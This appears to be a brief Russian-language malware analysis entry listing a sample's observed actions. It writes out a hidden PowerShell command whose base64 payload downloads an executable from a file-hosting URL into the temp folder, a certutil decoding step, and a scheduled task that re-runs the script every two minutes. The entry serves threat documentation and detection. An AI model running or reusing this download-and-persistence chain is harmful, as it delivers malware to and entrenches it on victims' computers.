Техническая информация
- <SYSTEM32>\tasks\n5dmmjebyc
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle hidden echo cG93ZXJzaGVsbCAtY29tbWFuZCAtV2luZG93U3R5bGUgaGlkZGVuICJJV1IgJ2h0dHBzOi8vcGl4ZWxkcmFpbi5jb20vYXBpL2ZpbGUvS3lzMVRaUEg/ZG93bmxvYWQnIC1PdXRGaWxlICckZW52OlRFTVBcZW5kLmV4ZSci...
- '<SYSTEM32>\certutil.exe' -decode %TEMP%\phase1.ps1 %TEMP%\phase2.ps1
- '<SYSTEM32>\schtasks.exe' /create /f /sc minute /mo 2 /tn n5dMmJEBYc /tr %TEMP%\phase2.ps1
- %TEMP%\phase2.ps1